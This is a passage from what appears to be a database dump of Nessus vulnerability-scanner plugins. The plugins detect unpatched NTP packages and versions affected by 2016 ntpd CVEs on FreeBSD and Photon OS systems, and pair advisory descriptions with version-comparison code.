(INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96123);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:39.ntp\");\n\n script_name(english:\"FreeBSD : FreeBSD -- Multiple vulnerabilities of ntp (fcedcdbb-c86e-11e6-b1cf-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the NTP suite :\n\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy of Cisco\nASIG.\n\nCVE-2016-9310: Mode 6 unauthenticated trap information disclosure and\nDDoS vector. Reported by Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS. Reported by\nMatthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS. Reported\nby Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass.\nReported by Sharon Goldberg and Aanchal Malhotra of Boston University.\n\nCVE-2016-7434: NULL pointer dereference in\n_IO_str_init_static_internal(). Reported by Magnus Stubman.\n\nCVE-2016-7426: Client rate limiting and server responses. Reported by\nMiroslav Lichvar of Red Hat.\n\nCVE-2016-7433: Reboot sync calculation problem. Reported independently\nby Brian Utterback of Oracle, and by Sharon Goldberg and Aanchal\nMalhotra of Boston University. Impact : A remote attacker who can send\na specially crafted packet to cause a NULL pointer dereference that\nwill crash ntpd, resulting in a Denial of Service. [CVE-2016-9311]\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, 'restrict default noquery ...' is not specified,\na specially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring by an attacker from remote.\n[CVE-2016-9310]\n\nAn attacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n[CVE-2016-7427]\n\nAn attacker with access to the NTP broadcast domain can send specially\ncrafted broadcast mode NTP packets to the broadcast domain which,\nwhile being logged by ntpd, will cause ntpd to reject broadcast mode\npackets from legitimate NTP broadcast servers. [CVE-2016-7428]\n\nOrigin timestamp problems were fixed in ntp 4.2.8p6. However,\nsubsequent timestamp validation checks introduced a regression in the\nhandling of some Zero origin timestamp checks. [CVE-2016-7431]\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet. [CVE-2016-7434]\n\nAn attacker who knows the sources (e.g., from an IPv4 refid in server\nresponse) and knows the system is (mis)configured in this way can\nperiodically send packets with spoofed source address to keep the rate\nlimiting activated and prevent ntpd from accepting valid responses\nfrom its sources. [CVE-2016-7426]\n\nNtp Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. The calculations and formulas have been\nreviewed and reconciled, and the code has been updated accordingly.\n[CVE-2016-7433]\"\n );\n # https://vuxml.freebsd.org/freebsd/fcedcdbb-c86e-11e6-b1cf-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?448b983e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=11.0<11.0_6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.3<10.3_15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.2<10.2_28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.1<10.1_45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=9.3<9.3_53\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-30T09:41:05", "description": "The version of the remote NTP server is 4.x prior to 4.2.8p9. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists when rate\n limiting is configured for all associations, the limits\n also being applied to responses received from the\n configured sources. An unauthenticated, remote attacker\n can exploit this, by periodically sending spoofed\n packets, to keep rate limiting active, resulting in\n valid responses not being accepted by ntpd from its\n sources. (CVE-2016-7426)\n\n - A denial of service vulnerability exists in the\n broadcast mode replay prevention functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets\n periodically injected into the broadcast domain, to\n cause ntpd to reject broadcast mode packets from\n legitimate NTP broadcast servers. (CVE-2016-7427)\n\n - A denial of service vulnerability exists in the\n broadcast mode poll interval functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets, to cause\n ntpd to reject packets from a legitimate NTP broadcast\n server. (CVE-2016-7428)\n\n - A denial of service vulnerability exists when receiving\n server responses on sockets that correspond to different\n interfaces than what were used in the request. An\n unauthenticated, remote attacker can exploit this, by\n sending repeated requests using specially crafted\n packets with spoofed source addresses, to cause ntpd\n to select the incorrect interface for the source, which\n prevents it from sending new requests until the\n interface list is refreshed. This eventually results in\n preventing ntpd from synchronizing with the source.\n (CVE-2016-7429)\n\n - A flaw exists that allows packets with an origin\n timestamp of zero to bypass security checks. An\n unauthenticated, remote attacker can exploit this to\n spoof arbitrary content. (CVE-2016-7431)\n\n - A flaw exists due to the root delay being included\n twice, which may result in the jitter value being higher\n than expected. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2016-7433)\n\n - A denial of service vulnerability exists when handling\n specially crafted mrulist query packets that allows an\n unauthenticated, remote attacker to crash ntpd.\n (CVE-2016-7434)\n\n - A flaw exists in the control mode (mode 6) functionality\n when handling specially crafted control mode packets. An\n unauthenticated, adjacent attacker can exploit this to\n set or disable ntpd traps, resulting in the disclosure\n of potentially sensitive information, disabling of\n legitimate monitoring, or DDoS amplification.\n (CVE-2016-9310)\n\n - A NULL pointer dereference flaw exists in the\n report_event() function within file ntpd/ntp_control.c\n when the trap service handles certain peer events. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted packet, to cause a denial of service\n condition. (CVE-2016-9311)\n\n - A denial of service vulnerability exists when handling\n oversize UDP packets that allows an unauthenticated,\n remote attacker to crash ntpd. Note that this\n vulnerability only affects Windows versions.\n (CVE-2016-9312)", "edition": 25, "cvss3": {"score": 3.7, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2016-12-06T00:00:00", "title": "Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p9 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-06T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_4_2_8P9.NASL", "href": "https://www.tenable.com/plugins/nessus/95575", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95575);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\",\n \"CVE-2016-9312\"\n );\n script_bugtraq_id(\n 94444,\n 94446,\n 94447,\n 94448,\n 94450,\n 94451,\n 94452,\n 94453,\n 94454,\n 94455\n );\n script_xref(name:\"CERT\", value:\"633847\");\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p9 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for a vulnerable NTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote NTP server is 4.x prior to 4.2.8p9. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists when rate\n limiting is configured for all associations, the limits\n also being applied to responses received from the\n configured sources. An unauthenticated, remote attacker\n can exploit this, by periodically sending spoofed\n packets, to keep rate limiting active, resulting in\n valid responses not being accepted by ntpd from its\n sources. (CVE-2016-7426)\n\n - A denial of service vulnerability exists in the\n broadcast mode replay prevention functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets\n periodically injected into the broadcast domain, to\n cause ntpd to reject broadcast mode packets from\n legitimate NTP broadcast servers. (CVE-2016-7427)\n\n - A denial of service vulnerability exists in the\n broadcast mode poll interval functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets, to cause\n ntpd to reject packets from a legitimate NTP broadcast\n server. (CVE-2016-7428)\n\n - A denial of service vulnerability exists when receiving\n server responses on sockets that correspond to different\n interfaces than what were used in the request. An\n unauthenticated, remote attacker can exploit this, by\n sending repeated requests using specially crafted\n packets with spoofed source addresses, to cause ntpd\n to select the incorrect interface for the source, which\n prevents it from sending new requests until the\n interface list is refreshed. This eventually results in\n preventing ntpd from synchronizing with the source.\n (CVE-2016-7429)\n\n - A flaw exists that allows packets with an origin\n timestamp of zero to bypass security checks. An\n unauthenticated, remote attacker can exploit this to\n spoof arbitrary content. (CVE-2016-7431)\n\n - A flaw exists due to the root delay being included\n twice, which may result in the jitter value being higher\n than expected. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2016-7433)\n\n - A denial of service vulnerability exists when handling\n specially crafted mrulist query packets that allows an\n unauthenticated, remote attacker to crash ntpd.\n (CVE-2016-7434)\n\n - A flaw exists in the control mode (mode 6) functionality\n when handling specially crafted control mode packets. An\n unauthenticated, adjacent attacker can exploit this to\n set or disable ntpd traps, resulting in the disclosure\n of potentially sensitive information, disabling of\n legitimate monitoring, or DDoS amplification.\n (CVE-2016-9310)\n\n - A NULL pointer dereference flaw exists in the\n report_event() function within file ntpd/ntp_control.c\n when the trap service handles certain peer events. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted packet, to cause a denial of service\n condition. (CVE-2016-9311)\n\n - A denial of service vulnerability exists when handling\n oversize UDP packets that allows an unauthenticated,\n remote attacker to crash ntpd. Note that this\n vulnerability only affects Windows versions.\n (CVE-2016-9312)\");\n # http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?08645c8c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3067\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3072\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3082\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3102\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3110\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3113\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3114\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3119\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to NTP version 4.2.8p9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9311\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\napp_name = \"NTP Server\";\n\nport = get_kb_item(\"Services/udp/ntp\");\nif (empty_or_null(port)) port = 123;\n\nversion = get_kb_item_or_exit(\"Services/ntp/version\");\nif (version == 'unknown') audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nmatch = eregmatch(string:version, pattern:\"([0-9a-z.]+)\");\nif (isnull(match) || empty_or_null(match[1])) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\n# Paranoia check\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = match[1];\nverfields = split(ver, sep:\".\", keep:FALSE);\nmajor = int(verfields[0]);\nminor = int(verfields[1]);\nif ('p' >< verfields[2])\n{\n revpatch = split(verfields[2], sep:\"p\", keep:FALSE);\n rev = int(revpatch[0]);\n patch = int(revpatch[1]);\n}\nelse\n{\n rev = verfields[2];\n patch = 0;\n}\n\n# This vulnerability affects NTP 4.x < 4.2.8p9\n# Check for vuln, else audit out.\nif (\n (major == 4 && minor < 2) ||\n (major == 4 && minor == 2 && rev < 8) ||\n (major == 4 && minor == 2 && rev == 8 && patch < 9)\n)\n{\n fix = \"4.2.8p9\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nreport =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\nsecurity_report_v4(\n port : port,\n proto : \"udp\",\n extra : report,\n severity : SECURITY_HOLE\n);\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the ntpstat package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Ntpstat PHSA-2017-0003", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntpstat", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0003_NTPSTAT.NASL", "href": "https://www.tenable.com/plugins/nessus/121669", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121669);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Ntpstat PHSA-2017-0003\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ntpstat package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-19.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntpstat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntpstat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the ntp package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Ntp PHSA-2017-0003", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntp", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0003_NTP.NASL", "href": "https://www.tenable.com/plugins/nessus/121668", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121668);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Ntp PHSA-2017-0003\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ntp package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-19.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", 